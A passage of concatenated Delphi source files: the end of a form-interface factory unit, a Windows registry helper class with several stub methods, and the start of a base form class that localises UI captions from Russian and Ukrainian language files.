out PathItem: TPathItem; AllowVirtualItems: Boolean): Boolean; end; IBackgroundTaskStatusForm = interface(IFormInterface) ['{22AFC874-9408-45C1-9F83-04F490B928F1}'] function ShowModal: Integer; procedure SetProgress(Max, Position: Int64); procedure SetText(Text: string); procedure CloseForm; end; IFormSelectDuplicateDirectories = interface(IFormInterface) ['{80EA9FEA-2958-4CB4-84C9-7D729C054618}'] function Execute(DirectoriesInfo: TList<string>): string; end; TListElementType = (leWebLink, leInfoLabel); TListElements = TDictionary<TListElementType, TControl>; ILinkItemSelectForm = interface; TProcessActionLinkProcedure = reference to procedure(Action: string; WebLink: TWebLink); TAddActionProcedure = reference to procedure(Actions: array of string; ProcessActionLink: TProcessActionLinkProcedure); IFormLinkItemEditorData = interface procedure ApplyChanges; function GetEditorData: TDataObject; function GetEditorPanel: TPanel; function GetTopPanel: TPanel; property EditorData: TDataObject read GetEditorData; property EditorPanel: TPanel read GetEditorPanel; property TopPanel: TPanel read GetTopPanel; end; ILinkEditor = interface procedure SetForm(Form: IFormLinkItemEditorData); procedure CreateNewItem(Sender: ILinkItemSelectForm; var Data: TDataObject; Verb: string; Elements: TListElements); procedure CreateEditorForItem(Sender: ILinkItemSelectForm; Data: TDataObject; EditorData: IFormLinkItemEditorData); procedure UpdateItemFromEditor(Sender: ILinkItemSelectForm; Data: TDataObject; EditorData: IFormLinkItemEditorData); procedure FillActions(Sender: ILinkItemSelectForm; AddActionProc: TAddActionProcedure); function OnDelete(Sender: ILinkItemSelectForm; Data: TDataObject; Editor: TPanel): Boolean; function OnApply(Sender: ILinkItemSelectForm): Boolean; end; ILinkItemSelectForm = interface(IFormInterface) ['{92517237-BEFB-4033-BD56-3974E650E954}'] function Execute(ListWidth: Integer; Title: string; Data: TList<TDataObject>; Editor: ILinkEditor): Boolean; function GetDataList: TList<TDataObject>; property DataList: TList<TDataObject> read GetDataList; end; IFormLinkItemEditor = interface(IFormInterface) ['{EBFFA2F7-FF90-4425-B217-916E70F8399C}'] function Execute(Title: string; Data: TDataObject; Editor: ILinkEditor): Boolean; end; IFormCollectionPreviewSettings = interface(IFormInterface) ['{AC28FCD4-E07B-4FC5-BB42-03E91989457B}'] function Execute(CollectionFileName: string): Boolean; end; IFullScreenControl = interface(IFormInterface) ['{09079B22-272B-4474-B5F1-8E6CACAD7AD8}'] procedure Hide; procedure Close; procedure Pause; procedure Play; function HasMouse: Boolean; procedure MoveToForm(Form: TDBForm); procedure SetButtonsEnabled(Value: Boolean); procedure SetPlayEnabled(Value: Boolean); end; ISlideShowForm = interface(IFormInterface) ['{CFB4A1D1-08D4-4F16-9ACB-05BD2EBC0B29}'] procedure Next; procedure Previous; procedure Pause; procedure Play; procedure Execute; procedure Close; procedure DisableControl; procedure EnableControl; end; IFullScreenImageForm = interface(IFormInterface) ['{531EDB91-3324-4982-86CC-F15840D3E3EE}'] procedure DrawImage(Image: TBitmap); procedure Pause; procedure Play; procedure Close; procedure DisableControl; procedure EnableControl; end; type TFormInterfaces = class(TObject) private FFormInterfaces: TDictionary<TGUID, TComponentClass>; FFormInstances: TDictionary<TGUID, TForm>; FCreationList: TList<TGUID>; public constructor Create; destructor Destroy; override; procedure RegisterFormInterface(Intf: TGUID; FormClass: TComponentClass); function CreateForm<T: IInterface>(): T; function GetSingleForm<T: IInterface>(CreateNew: Boolean): T; function GetSingleFormInstance<TFormClass: TForm>(Intf: TGUID; CreateNew: Boolean): TFormClass; procedure RemoveSingleInstance(FormInstance: TForm); end; function FormInterfaces: TFormInterfaces; function Viewer: IViewerForm; function CurrentViewer: IViewerForm; function AboutForm: IAboutForm; function ActivationForm: IActivationForm; function OptionsForm: IOptionsForm; function RequestPasswordForm: IRequestPasswordForm; function BatchProcessingForm: IBatchProcessingForm; function JpegOptionsForm: IJpegOptionsForm; function SelectSourceForm: ISelectSourceForm; function ImportForm: IImportForm; function StringPromtForm: IStringPromtForm; function EncryptForm: IEncryptForm; function SteganographyForm: ISteganographyForm; function ShareForm: IShareForm; function ShareLinkForm: IShareLinkForm; function GroupsSelectForm: IGroupsSelectForm; function GroupInfoForm: IGroupInfoForm; function GroupCreateForm: IGroupCreateForm; function CollectionAddItemForm: ICollectionAddItemForm; function CDExportForm: ICDExportForm; function CDMapperForm: ICDMapperForm; function SelectLocationForm: ISelectLocationForm; function LinkItemSelectForm: ILinkItemSelectForm; function BackgroundTaskStatusForm: IBackgroundTaskStatusForm; function CollectionPreviewSettings: IFormCollectionPreviewSettings; function FormLinkItemEditor: IFormLinkItemEditor; function FormSelectDuplicateDirectories: IFormSelectDuplicateDirectories; function FullScreenControl: IFullScreenControl; function FullScreenImageForm: IFullScreenImageForm; function SlideShowForm: ISlideShowForm; implementation var FFormInterfaces: TFormInterfaces = nil; function FormInterfaces: TFormInterfaces; begin if FFormInterfaces = nil then FFormInterfaces := TFormInterfaces.Create; Result := FFormInterfaces; end; function Viewer: IViewerForm; begin Result := FormInterfaces.GetSingleForm<IViewerForm>(True); end; function CurrentViewer: IViewerForm; begin Result := FormInterfaces.GetSingleForm<IViewerForm>(False); end; function AboutForm: IAboutForm; begin Result := FormInterfaces.GetSingleForm<IAboutForm>(True); end; function ActivationForm: IActivationForm; begin Result := FormInterfaces.GetSingleForm<IActivationForm>(True); end; function OptionsForm: IOptionsForm; begin Result := FormInterfaces.GetSingleForm<IOptionsForm>(True); end; function RequestPasswordForm: IRequestPasswordForm; begin Result := FormInterfaces.CreateForm<IRequestPasswordForm>(); end; function BatchProcessingForm: IBatchProcessingForm; begin Result := FormInterfaces.CreateForm<IBatchProcessingForm>(); end; function JpegOptionsForm: IJpegOptionsForm; begin Result := FormInterfaces.GetSingleForm<IJpegOptionsForm>(True); end; function SelectSourceForm: ISelectSourceForm; begin Result := FormInterfaces.CreateForm<ISelectSourceForm>(); end; function ImportForm: IImportForm; begin Result := FormInterfaces.CreateForm<IImportForm>(); end; function StringPromtForm: IStringPromtForm; begin Result := FormInterfaces.CreateForm<IStringPromtForm>(); end; function EncryptForm: IEncryptForm; begin Result := FormInterfaces.CreateForm<IEncryptForm>(); end; function SteganographyForm: ISteganographyForm; begin Result := FormInterfaces.CreateForm<ISteganographyForm>(); end; function ShareForm: IShareForm; begin Result := FormInterfaces.CreateForm<IShareForm>(); end; function ShareLinkForm: IShareLinkForm; begin Result := FormInterfaces.CreateForm<IShareLinkForm>(); end; function GroupsSelectForm: IGroupsSelectForm; begin Result := FormInterfaces.CreateForm<IGroupsSelectForm>(); end; function GroupInfoForm: IGroupInfoForm; begin Result := FormInterfaces.CreateForm<IGroupInfoForm>(); end; function GroupCreateForm: IGroupCreateForm; begin Result := FormInterfaces.CreateForm<IGroupCreateForm>(); end; function CollectionAddItemForm: ICollectionAddItemForm; begin Result := FormInterfaces.CreateForm<ICollectionAddItemForm>(); end; function CDExportForm: ICDExportForm; begin Result := FormInterfaces.GetSingleForm<ICDExportForm>(True); end; function CDMapperForm: ICDMapperForm; begin Result := FormInterfaces.GetSingleForm<ICDMapperForm>(True); end; function SelectLocationForm: ISelectLocationForm; begin Result := FormInterfaces.CreateForm<ISelectLocationForm>(); end; function LinkItemSelectForm: ILinkItemSelectForm; begin Result := FormInterfaces.CreateForm<ILinkItemSelectForm>(); end; function BackgroundTaskStatusForm: IBackgroundTaskStatusForm; begin Result := FormInterfaces.CreateForm<IBackgroundTaskStatusForm>(); end; function CollectionPreviewSettings: IFormCollectionPreviewSettings; begin Result := FormInterfaces.CreateForm<IFormCollectionPreviewSettings>(); end; function FormLinkItemEditor: IFormLinkItemEditor; begin Result := FormInterfaces.CreateForm<IFormLinkItemEditor>(); end; function FullScreenControl: IFullScreenControl; begin Result := FormInterfaces.CreateForm<IFullScreenControl>(); end; function FullScreenImageForm: IFullScreenImageForm; begin Result := FormInterfaces.CreateForm<IFullScreenImageForm>(); end; function SlideShowForm: ISlideShowForm; begin Result := FormInterfaces.CreateForm<ISlideShowForm>(); end; function FormSelectDuplicateDirectories: IFormSelectDuplicateDirectories; begin Result := FormInterfaces.CreateForm<IFormSelectDuplicateDirectories>(); end; { TFormInterfaces } constructor TFormInterfaces.Create; begin FFormInterfaces := TDictionary<TGUID, TComponentClass>.Create; FFormInstances := TDictionary<TGUID, TForm>.Create; FCreationList := TList<TGUID>.Create; end; destructor TFormInterfaces.Destroy; begin F(FFormInterfaces); F(FFormInstances); F(FCreationList); inherited; end; function TFormInterfaces.CreateForm<T>: T; var G: TGUID; F: TForm; begin G := GetTypeData(TypeInfo(T))^.Guid; Application.CreateForm(FFormInterfaces[G], F); F.GetInterface(G, Result); end; function TFormInterfaces.GetSingleFormInstance<TFormClass>(Intf: TGUID; CreateNew: Boolean): TFormClass; begin if FFormInstances.ContainsKey(Intf) then Exit(FFormInstances[Intf] as TFormClass); if not CreateNew then Exit(nil); if GetCurrentThreadId <> MainThreadID then raise Exception.Create('Can''t create form using child thread!'); Application.CreateForm(FFormInterfaces[Intf], Result); FFormInstances.Add(Intf, Result); end; function TFormInterfaces.GetSingleForm<T>(CreateNew: Boolean): T; var G: TGUID; Form: TForm; begin G := GetTypeData(TypeInfo(T))^.Guid; if FCreationList.Contains(G) then Exit(T(nil)); if not FFormInstances.ContainsKey(G) then begin if not CreateNew then Exit(nil); if GetCurrentThreadId <> MainThreadID then raise Exception.Create('Can''t create form using child thread!'); FCreationList.Add(G); try Application.CreateForm(FFormInterfaces[G], Form); FFormInstances.Add(G, Form); finally FCreationList.Remove(G); end; end; FFormInstances[G].GetInterface(G, Result); end; procedure TFormInterfaces.RegisterFormInterface(Intf: TGUID; FormClass: TComponentClass); begin FFormInterfaces.Add(Intf, FormClass); end; procedure TFormInterfaces.RemoveSingleInstance(FormInstance: TForm); var Pair: TPair<TGUID, TForm>; begin for Pair in FFormInstances do if Pair.Value = FormInstance then begin FFormInstances.Remove(Pair.Key); Break; end; end; initialization finalization F(FFormInterfaces); end.
unit uReg; interface uses Windows, Dialogs, SysUtils, Classes; const UNIT_NAME = 'Reg'; kernel = 'kernel32.dll'; user = 'user32.dll'; rgCLASSES = 'CLASSES_ROOT'; rgCURRENT_USER = 'CURRENT_USER'; rgLOCAL_MACHINE = 'LOCAL_MACHINE'; rgUSERS = 'USERS'; rgPERF_DATA = 'PERFORMANCE_DATA'; rgCONFIG = 'CURRENT_CONFIG'; rgDYN_DATA = 'DYN_DATA'; regOptionNonVolatile = 0; regErrorNone = 0; regErrorBadDB = 1; regErrorBadKey = 2; regErrorCantOpen = 3; regErrorCantRead = 4; regErrorCantWrite = 5; regErrorOutOfMemory = 6; regErrorInvalidParameter = 7; regErrorAccessDenied = 8; regErrorInvalidParameterS = 87; regErrorNoMoreItems = 259; regKeyAllAccess = $3F; regKeyQueryValue = $1; regSZ = 1; regBinary = 3; regDWord = 4; type CReg = class(TObject) private procedure Emsg( s : string ); function Parms(v: array of Variant; Paired: Boolean): String; function GetStringParm(v: array of Variant; Paired: Boolean; MajorDelimiter, MinorDelimiter: String): String; function ucRight(s: String; NumOfRightChar: integer): String; public Procedure RegCreateNewKey( KeyName : String; RootKey : HKEY = HKEY_LOCAL_MACHINE); Procedure RegDeleteKey( KeyName : String ; RootKey : HKEY = HKEY_LOCAL_MACHINE); Procedure RegDeleteValue( KeyName, ValueName : String ; RootKey : HKEY = HKEY_LOCAL_MACHINE ); Function RegEnumerateSubKeys( KeyName : String; Keys : TStringList ; RootKey : HKEY = HKEY_LOCAL_MACHINE) : Integer; Function RegEnumerateValues( KeyName : String; Values : TStringList ; RootKey : HKEY = HKEY_LOCAL_MACHINE) : Integer; Function RegGetKeyValue( KeyName, ValueName : String; RootKey : HKEY = HKEY_LOCAL_MACHINE) : Variant; Function ConvertRootKey( RootKey : String) : LongInt; overload; Function ConvertRootKey( RootKey : Cardinal) : String; overload; Function RegError( ErrorCode : LongInt) : String; Procedure RegSetKeyValue( KeyName, ValueName : String; Data : String; RootKey : HKEY = HKEY_LOCAL_MACHINE); overload; Procedure RegSetKeyValue( KeyName, ValueName : String; Data : LongInt; RootKey : HKEY = HKEY_LOCAL_MACHINE); overload; Procedure RegSetKeyValue( KeyName, ValueName : String; Data: array of Byte; RootKey : HKEY = HKEY_LOCAL_MACHINE); overload; Function RegGet( KeyName, ValueName : String; DefaultValue : String = ''; RootKey : HKEY = HKEY_LOCAL_MACHINE) : String; Procedure RegSet( KeyName, ValueName : String; Data : String; RootKey : HKEY = HKEY_LOCAL_MACHINE); constructor Create(); overload; constructor Create(callingWindowedApp : TObject); overload; destructor Destroy; override; end; function APICopyFile(ExistingFile, NewFile: PChar; nFailIfExists: LongInt): LongInt; stdcall; external kernel name 'CopyFileA'; implementation Procedure CReg.RegCreateNewKey( KeyName : String; RootKey : HKEY = HKEY_LOCAL_MACHINE); Begin try except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'RootKey',RootKey ], True)); raise; end; {try} End; Procedure CReg.RegDeleteKey( KeyName : String ; RootKey : HKEY = HKEY_LOCAL_MACHINE); Begin try except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'RootKey',RootKey ], True)); raise; end; {try} End; Procedure CReg.RegDeleteValue( KeyName, ValueName : String ; RootKey : HKEY = HKEY_LOCAL_MACHINE ); Begin try except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'ValueName', ValueName, 'RootKey',RootKey ], True)); raise; end; {try} End; Function CReg.RegEnumerateSubKeys( KeyName : String; Keys : TStringList ; RootKey : HKEY = HKEY_LOCAL_MACHINE) : Integer; Begin result := -1; try except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'RootKey',RootKey ], True)); raise; end; {try} End; Function CReg.RegEnumerateValues( KeyName : String; Values : TStringList ; RootKey : HKEY = HKEY_LOCAL_MACHINE) : Integer; Begin result := -1; try except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'RootKey',RootKey ], True)); raise; end; {try} End; Function CReg.RegGetKeyValue( KeyName, ValueName : String; RootKey : HKEY = HKEY_LOCAL_MACHINE) : Variant; var lReturnValue, lData, lType, lSize : LongInt; lHKey : HKEY; vValue : Variant; sValue, sKeyName : String; pcBuffer : PChar; Begin result := ''; sKeyName := KeyName; try vValue := varEmpty; lSize := 0; lReturnValue := RegOpenKeyEx( RootKey, PChar(sKeyName), 0, regKeyQueryValue, lHKey); if lReturnValue = regErrorNone then begin try lReturnValue := RegQueryValueEx( lHKey, Pchar(ValueName), 0, @lType, 0, @lSize); if lReturnValue = regErrorNone then begin sValue := StringOfChar(' ', lSize); Case lType of regSZ : begin result := ''; if ( lSize > 0 ) then begin lReturnValue := RegQueryValueEx( lHKey, Pchar(ValueName), 0, @lType, PByte(sValue), @lSize); // lReturnValue := RegQueryValueEx( lHKey, Pchar(ValueName), 0, @lType, Pchar(sValue), @lSize); result := sValue; end; end; regBinary : begin result := 0; lReturnValue := RegQueryValueEx( lHKey, Pchar(ValueName), 0, @lType, PByte(sValue), @lSize); // lReturnValue := RegQueryValueEx( lHKey, Pchar(ValueName), 0, @lType, Pchar(sValue), @lSize); If ( lReturnValue = regErrorNone ) Then begin MoveMemory(PChar(sValue), @lData, SizeOf(lData)); result := lData; end; end; regDWord : begin result := 0; lReturnValue := RegQueryValueEx( lHKey, Pchar(ValueName), 0, @lType, PByte(sValue), @lSize); //lReturnValue := RegQueryValueEx( lHKey, Pchar(ValueName), 0, @lType, Pchar(sValue), @lSize); If ( lReturnValue = regErrorNone ) Then begin MoveMemory(PChar(sValue), @lData, SizeOf(lData)); result := lData; end; end; {4:} end; {Case} end;{ Call returned no errors} finally RegCloseKey( lHKey ); end; {try} end; except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'RootKey',RootKey ], True)); raise; end; {try} End; Function CReg.RegError( ErrorCode : LongInt) : String; Begin Result := ''; Case ErrorCode of regErrorNone : Result := 'No Error'; regErrorBadDB : Result := 'Bad DB'; regErrorBadKey : Result := 'Invalid Key'; regErrorCantOpen : Result := 'Cannot Open Key'; regErrorCantRead : Result := 'Cannot Read Key'; regErrorCantWrite : Result := 'Cannot write to Key'; regErrorOutOfMemory : Result := 'Out of Memory'; regErrorInvalidParameter : Result := 'Invalid Parameter'; regErrorAccessDenied : Result := 'Access Denied'; regErrorInvalidParameterS : Result := 'Invalid Parameters'; regErrorNoMoreItems : Result := 'No More Items'; end; {case} End; Function CReg.ConvertRootKey( RootKey : Cardinal) : String; Begin result := ''; try Case RootKey of HKEY_CLASSES_ROOT : result := 'HKEY_CLASSES_ROOT'; HKEY_CURRENT_USER : result := 'HKEY_CURRENT_USER'; HKEY_LOCAL_MACHINE : result := 'HKEY_LOCAL_MACHINE'; HKEY_USERS : result := 'HKEY_USERS'; HKEY_PERFORMANCE_DATA : result := 'HKEY_PERFORMANCE_DATA'; HKEY_CURRENT_CONFIG : result := 'HKEY_CURRENT_CONFIG'; HKEY_DYN_DATA : result := 'HKEY_DYN_DATA'; end; {case} except EMsg(UNIT_NAME + ':ConvertRootKey' + Parms(['RootKey', RootKey ], True)); raise; end; {try} End; Function CReg.ConvertRootKey( RootKey : String) : LongInt; Begin result := 0; try if UpperCase(ucRight(RootKey, Length(rgCLASSES))) = rgCLASSES then result := HKEY_CLASSES_ROOT else if UpperCase(ucRight(RootKey, Length(rgCURRENT_USER))) = rgCURRENT_USER then result := HKEY_CURRENT_USER else if UpperCase(ucRight(RootKey, Length(rgLOCAL_MACHINE))) = rgLOCAL_MACHINE then result := HKEY_LOCAL_MACHINE else if UpperCase(ucRight(RootKey, Length(rgUSERS))) = rgUSERS then result := HKEY_USERS else if UpperCase(ucRight(RootKey, Length(rgPERF_DATA))) = rgPERF_DATA then result := HKEY_PERFORMANCE_DATA else if UpperCase(ucRight(RootKey, Length(rgCONFIG))) = rgCONFIG then result := HKEY_CURRENT_CONFIG else if UpperCase(ucRight(RootKey, Length(rgDYN_DATA))) = rgDYN_DATA then result := HKEY_DYN_DATA else raise Exception.Create(QuotedStr(RootKey) + ' is an invalid root key.'); except EMsg(UNIT_NAME + ':ConvertRootKey' + Parms(['RootKey', RootKey ], True)); raise; end; {try} End; Procedure CReg.RegSetKeyValue( KeyName, ValueName : String; Data : String; RootKey : HKEY = HKEY_LOCAL_MACHINE); var lHKey : HKEY; Begin try RegCreateKeyEx(RootKey, PChar(KeyName), 0, '', regOptionNonVolatile, regKeyAllAccess, nil, lHKey, nil); RegSetValueEx(lHKey, PChar(ValueName), 0, regSZ, PChar(Data), Length(Data)); RegCloseKey( lHKey ); except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'ValueName', ValueName, 'Data', Data, 'RootKey', ConvertRootKey(RootKey) ], True)); raise; end; {try} End; Procedure CReg.RegSetKeyValue( KeyName, ValueName : String; Data : LongInt; RootKey : HKEY = HKEY_LOCAL_MACHINE); var lHKey : HKEY; Begin try RegCreateKeyEx(RootKey, PChar(KeyName), 0, '', regOptionNonVolatile, regKeyAllAccess, nil, lHKey, nil); RegSetValueEx(lHKey, PChar(ValueName), 0, regSZ, @(Data), SizeOf(Data)); RegCloseKey( lHKey ); except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'ValueName', ValueName, 'Data', Data, 'RootKey', ConvertRootKey(RootKey) ], True)); raise; end; {try} End; Procedure CReg.RegSetKeyValue( KeyName, ValueName : String; Data: array of Byte; RootKey : HKEY = HKEY_LOCAL_MACHINE); var lHKey : HKEY; Begin try RegCreateKeyEx(RootKey, PChar(KeyName), 0, '', regOptionNonVolatile, regKeyAllAccess, nil, lHKey, nil); RegSetValueEx(lHKey, PChar(ValueName), 0, regSZ, @(Data), SizeOf(Data)); RegCloseKey( lHKey ); except EMsg(UNIT_NAME + ':RegCreateNewKey' + Parms(['KeyName', KeyName, 'ValueName', ValueName, 'Data', 'Array of Byte', 'RootKey', ConvertRootKey(RootKey) ], True)); raise; end; {try} End; Procedure CReg.RegSet( KeyName, ValueName : String; Data : String; RootKey : HKEY = HKEY_LOCAL_MACHINE); Begin try RegSetKeyValue(KeyName, ValueName, Data, RootKey); except EMsg(UNIT_NAME + ':RegSet' + Parms(['KeyName', KeyName, 'ValueName', ValueName, 'Data', Data, 'RootKey', ConvertRootKey(RootKey) ], True)); raise; end; {try} End; Function CReg.RegGet( KeyName, ValueName : String; DefaultValue : String = ''; RootKey : HKEY = HKEY_LOCAL_MACHINE) : String; Begin result := DefaultValue; try result := Trim( RegGetKeyValue(KeyName, ValueName, RootKey) ); if ( result = '' ) then result := Trim( DefaultValue ); except raise Exception.Create(UNIT_NAME + ':RegGet' + Parms(['KeyName', KeyName, 'ValueName', ValueName, 'RootKey', ConvertRootKey(RootKey) ], True)); end; {try} End; constructor CReg.Create; begin end; constructor CReg.Create(callingWindowedApp: TObject); begin end; destructor CReg.Destroy; begin inherited; end; procedure CReg.Emsg(s: string); begin MessageDlg(s, mtError,[mbOk], 0); End; function CReg.Parms(v: array of Variant; Paired: Boolean): String; Begin try Parms := GetStringParm(v, Paired, ', ', ' = '); except EMsg(UNIT_NAME + ':CFileDir.Parms' + '- Error'); raise; end; {try.. except} End; function CReg.GetStringParm(v: array of Variant; Paired: Boolean; MajorDelimiter, MinorDelimiter: String): String; begin End; function CReg.ucRight( s : String; NumOfRightChar : integer ) : String; Begin Result := Copy(s, ((Length(s) - NumOfRightChar) + 1), NumOfRightChar); End; END.
{ Самая что нинаесть базовая форма От нее наследуются все формы, которые включены в проект Я бы не советовал добавлять сюда визуальные компоненты, т.к. они могут вовлечь гору геморроя в нашу и так несладкую жизнь. Также не следует использовать события OnCreate, OnClose, OnShow и т.д, т.к. они могут не сработать у наследников, которые не имеют ключевого слова inherited в реализации события. В случае острой необходимости нужно проставить inherited после begin во всех обработчиках этих событий. В данном модуле переопределен конструктор формы. Следует помнить, что выполняется он ПОСЛЕ события OnCreate формы-наследника. Так же можно переопределить деструктор и производить какие-либо действия при закрытии формы Олег Козачок 13.03.2006 } unit uCommonForm; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, ExtCtrls, TypInfo, dbgrids, DBGridEh, RXDBCtrl, stdctrls, Buttons, uHelpButton,uOilQuery,uOilStoredProc; type TLangParser = class private function SkipDot(AStr: String): String; function GetWord(AStr: String): String; function IsGridTitle: Boolean; function ColumnName: string; public Line: String; function FormName: String; function ControlName: String; function PropName: String; function PropText: String; function IsFormCaption: Boolean; function IsBaseRef: Boolean; end; TCommonForm = class(TForm) private Parser : TLangParser; public procedure TranslateControls(ALangId: Integer); constructor Create(AOwner: TComponent); override; destructor Destroy; override; end; var CommonForm: TCommonForm; function TranslateText(AString: String): String; implementation uses Main, Base, uStart, ExFunc; {$R *.DFM} function TranslateText(AString: String): String; var num: integer; begin try Result:=AString; if (not TRANSLATE) and (LANG_INTERFACE = 1) then begin num:=SLru.IndexOf(AString); // запоминаем позицию в ru_msg.ini if num<>-1 then if trim(SLua.Strings[num])<>'' then Result:=SLua.Strings[num]; end; except Result:=AString; end; end; { функция проверяет наличие свойства у компонента читай комментарии SetProperty } function HasProperty(Comp: TComponent; const Prop: string): Boolean; var PropList: PPropList; NumProps, i: Integer; begin Result := False; GetMem(proplist, GetTypeData(comp.classinfo)^.propcount * Sizeof(Pointer)); try NumProps := GetPropList(Comp.ClassInfo, tkProperties, PropList); for i := 0 to pred(NumProps) do begin if CompareText(PropList[i]^.Name, Prop) = 0 then begin Result := true; Break; end; end; finally FreeMem(PropList, GetTypeData(Comp.Classinfo)^.PropCount * Sizeof(Pointer)); end; end; {функция устанавливает свойство компонента} procedure SetProperty(Comp: TComponent; const Prop, S: string); var PropList: PPropList; NumProps, i: Integer; begin {выделить память под указатели на имеющиеся у компонента свойства} GetMem(Proplist, GetTypeData(Comp.ClassInfo)^.PropCount * Sizeof(Pointer)); try {Кол-во свойств компонента} NumProps := GetPropList(Comp.ClassInfo, tkProperties, PropList); for i := 0 to pred(NumProps) do begin {если то что нам нужно} if (CompareText(PropList[i]^.Name, Prop) = 0) then begin {установить свойство} SetStrProp(comp, proplist[i], s); Break; end; end; finally FreeMem(PropList, GetTypeData(Comp.ClassInfo)^.PropCount * Sizeof(Pointer)); end; end; function NvlInt(AInt, AIfZero: Integer): Integer; begin Result := AInt; if AInt <= 0 then Result := AIfZero end; { TLangParser } {выкинуть слово с точкой} function TLangParser.SkipDot(AStr: String): String; begin Result := Trim(Copy(AStr,Pos('.',AStr) + 1,Length(AStr))); end; {получить слово до точки или до знака =} function TLangParser.GetWord(AStr: String): String; begin AStr := Copy(AStr,1,NvlInt(Pos('=',AStr),Length(AStr))); Result := Trim(Copy(AStr,1 ,NvlInt(Pos('.',AStr) - 1,Pos('=',AStr)-1))); end; function TLangParser.FormName: String; begin {первое слово - название формы} Result := UpperCase(GetWord(Line)); end; function TLangParser.ControlName: String; begin {skip form name} Result := SkipDot(Line); {get control name} Result := UpperCase(GetWord(Result)); end; function TLangParser.PropName: String; begin {skip form name} Result := SkipDot(Line); {skip control name} Result := SkipDot(Result); {get property name} Result := UpperCase(GetWord(Result)); end; function TLangParser.PropText: String; var s: string; pStr: PChar; begin {получить текст от знака = до конца строки} s := Trim(Copy(Line,Pos('=',Line) + 1,Length(Line))); if pos('#13#10', s) > 0 then while (pos('#13#10', s) > 0) do begin if pos('''#13#10', s) > 0 then // убираємо кавичку перед #13#10 s := copy(s, 1, pos('''#13#10', s)-1) + copy(s, pos('''#13#10', s)+1, length(s)); if pos('#13#10''', s) > 0 then // убираємо кавичку після #13#10 s := copy(s, 1, pos('#13#10''', s)+5) + copy(s, pos('#13#10''', s)+7, length(s)); s := copy(s, 1, pos('#13#10', s)-1) +#13#10+ copy(s, pos('#13#10', s)+6, length(s)); // підставляємо #13#10 (ENTER) end; pStr := PChar(s); Result := AnsiExtractQuotedStr(pStr,''''); end; {True если Line - заголовок формы} function TLangParser.IsFormCaption: Boolean; begin Result := UpperCase(GetWord(SkipDot(Line))) = 'CAPTION'; end; function TLangParser.IsBaseRef: Boolean; begin Result := (FormName = UpperCase('BaseForm')) or (FormName = UpperCase('BaseFormEnh')); end; function TLangParser.IsGridTitle: Boolean; begin Result := Copy(PropName,1,1) = '['; end; function TLangParser.ColumnName: string; var PStr: PChar; begin Result := ''; PStr := PChar(Copy(PropName,2,length(PropName))); PStr := PChar(Copy(PStr,1,Pos(']',PStr)-1)); if PStr <> '' then Result := AnsiExtractQuotedStr(PStr, '''');; end; { TCommonForm } constructor TCommonForm.Create(AOwner: TComponent); var Lang: String; begin inherited; Parser := TLangParser.Create; try Lang := ReadPieceOfRegistry(HKEY_CURRENT_USER,'Software\Oil','Language'); if (Lang <> '') then begin TranslateControls( StrToInt(Lang) ); LANG_INTERFACE := StrToInt(Lang); end else begin LANG_INTERFACE:=0; StartLog(TranslateText('Проставляем ключ реестра Language')); WritePieceOfRegistry('Language',IntToStr(LANG_INTERFACE)); end; except on E:Exception do StartLog(TranslateText('Ошибка в конструкторе CommonForm: ')+E.Message); end; end; destructor TCommonForm.Destroy; begin FreeAndNil(Parser); inherited; end; { Берет из файла перевода строку, находит контрол на открываемой форме и устанавливает соответствующие свойства. Если контрол не найден ничего не происходит } procedure TCommonForm.TranslateControls(ALangId: Integer); var F: TextFile; S, Text: String; Comp : TComponent; Grid: TComponent; I, Index: Integer; IsUseBaseRef: Boolean; StItemsStr: TStringList; begin StartLog(ClassName+' start translate ... '+Formatdatetime('hh:mm:ss zzz',now)); try case ALangId of 0: AssignFile(F,GetMainDir+'language\rus.txt'); 1: AssignFile(F,GetMainDir+'language\ukr.txt'); end; Reset(F); {пройти по файлу} while not Eof(F) do begin Readln(F, Parser.Line); {использует ли форма базовый справочник} IsUseBaseRef := InheritsFrom(TBaseForm) and (Parser.FormName = 'BASEFORM'); {наша или базовая форма} if ('T'+Trim(Parser.FormName) = UpperCase(ClassName)) or IsUseBaseRef then begin {combobox, radiogroup, oilhelpbutton ...} if (Parser.PropName = 'ITEMS') and not Parser.IsBaseRef then begin S := ''; StItemsStr := TStringList.Create; Str2StringList(Parser.PropText, StItemsStr); Text := StItemsStr.Text; StItemsStr.Free; {Найти контрол на форме} Comp := FindComponent(Parser.ControlName); if (Assigned(Comp)) and (Text <> '') then begin {TCombobox} if Comp is TCombobox then begin {запомнить состояние} Index := (Comp as TCombobox).ItemIndex; (Comp as TCombobox).Items.Text := Text; if Index <= (Comp as TCombobox).Items.Count - 1 then (Comp as TCombobox).ItemIndex := Index; end; {TRadioGroup} if Comp is TRadioGroup then begin {запомнить состояние} Index := (Comp as TRadioGroup).ItemIndex; (Comp as TRadioGroup).Items.Text := Text; if Index <= (Comp as TRadioGroup).Items.Count - 1 then (Comp as TRadioGroup).ItemIndex := Index; end; {TOilHelpButton} if Comp is TOilHelpButton then (Comp as TOilHelpButton).Lines.Text := Text; end; end else {заполнить колонки грида} if Parser.IsGridTitle and not Parser.IsBaseRef then begin Grid := FindComponent(Parser.ControlName); if Grid is TDBGrid then // простой грид for i := 0 to (Grid as TDbGrid).Columns.Count-1 do if (Grid as TDbGrid).Columns[i].FieldName = Parser.ColumnName then begin (Grid as TDbGrid).Columns[i].Title.Caption := Parser.PropText; break; end; if Grid is TDbGridEh then // Eh грид for i := 0 to (Grid as TDbGridEh).Columns.Count-1 do if (Grid as TDbGridEh).Columns[i].FieldName = Parser.ColumnName then begin (Grid as TDbGridEh).Columns[i].Title.Caption := Parser.PropText; break; end; if Grid is TRxDbGrid then // RX грид for i := 0 to (Grid as TRxDbGrid).Columns.Count-1 do if (Grid as TRxDbGrid).Columns[i].FieldName = Parser.ColumnName then begin (Grid as TRxDbGrid).Columns[i].Title.Caption := Parser.PropText; break; 